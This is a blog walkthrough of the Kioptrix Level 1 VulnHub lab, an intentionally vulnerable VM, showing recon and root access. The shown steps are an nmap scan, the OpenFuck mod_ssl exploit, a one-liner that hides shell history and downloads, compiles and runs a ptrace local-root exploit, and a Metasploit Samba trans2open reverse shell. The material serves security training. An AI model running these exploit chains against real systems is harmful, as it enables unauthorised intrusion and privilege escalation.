Kioptrix: Level 1

Another day, another VulnHub post. Today I’m going to be writing up the first of five posts about the Kioptrix servies.

You can download the VM here

DESCRIPTION

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

MAPPING THE TARGET

We’ll start off by finding the IP of our target

1
2
3
4
5
6
7
8
[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts

11 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 660
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.104   00:0c:29:7c:3a:16      1      60  VMware, Inc.

Then running an nmap scan to see what ports are open

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
[email protected]:~$ sudo nmap -A -p- 192.168.1.104

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-19 22:54 EST
Nmap scan report for 192.168.1.104
Host is up (0.00022s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-01-20T04:56:51+00:00; +1h01m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)

EXPLOITING

This VM is one of the older ones on the VulnHub site, so practically everything is out of date, we should be able to find an exploit rather easily. I couldn’t find anything usable for our purposes with SSH so I moved on to Apache

1
2
3
4
5
6
7
8
9
[email protected]:~/Desktop$ searchsploit apache mod_ssl
---------------------------------------------------------------------
 Exploit Title                                                       |  Path
---------------------------------------------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow           | /multiple/dos/21575.txt
Apache mod_ssl 2.0.x - Remote Denial of Service                      | /linux/dos/24590.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)   | /unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)     | /unix/remote/21671.c
---------------------------------------------------------------------

OpenFuck looks perfect. I tried to get it working for a while but wasn’t having any luck until I stumbled across this blog post which tells us the required changes to make for the code to compile.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[email protected]:~$ ./OpenFuck 0x6b 192.168.1.104 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--01:03:53--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--01:03:53--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @ 957.28 KB/s

01:03:54 (957.28 KB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6225
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

And there we go! ~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

cat /var/mail/root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from [email protected])
 by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
 for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Since that one was so quick, I decided to try another way of gaining root. This time I tried exploiting the Samba service. Firstly I ran enum4linux against the box to find what version it was running

1
2
3
4
 ======================================= 
|    OS information on 192.168.1.104    |
 ======================================= 
[+] Got OS info for 192.168.1.104 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

This confirmed that it was an extremely old version, a quick search and I found an exploit from 2003 that comes packaged as a Metasploit module. Perfect!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(trans2open) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(trans2open) > set LPORT 8888
LPORT => 8888
msf exploit(trans2open) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.28:8888 
[*] 192.168.1.104:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.1.28:8888 -> 192.168.1.104:1025) at 2017-01-20 00:00:19 -0500

id 
uid=0(root) gid=0(root) groups=99(nobody)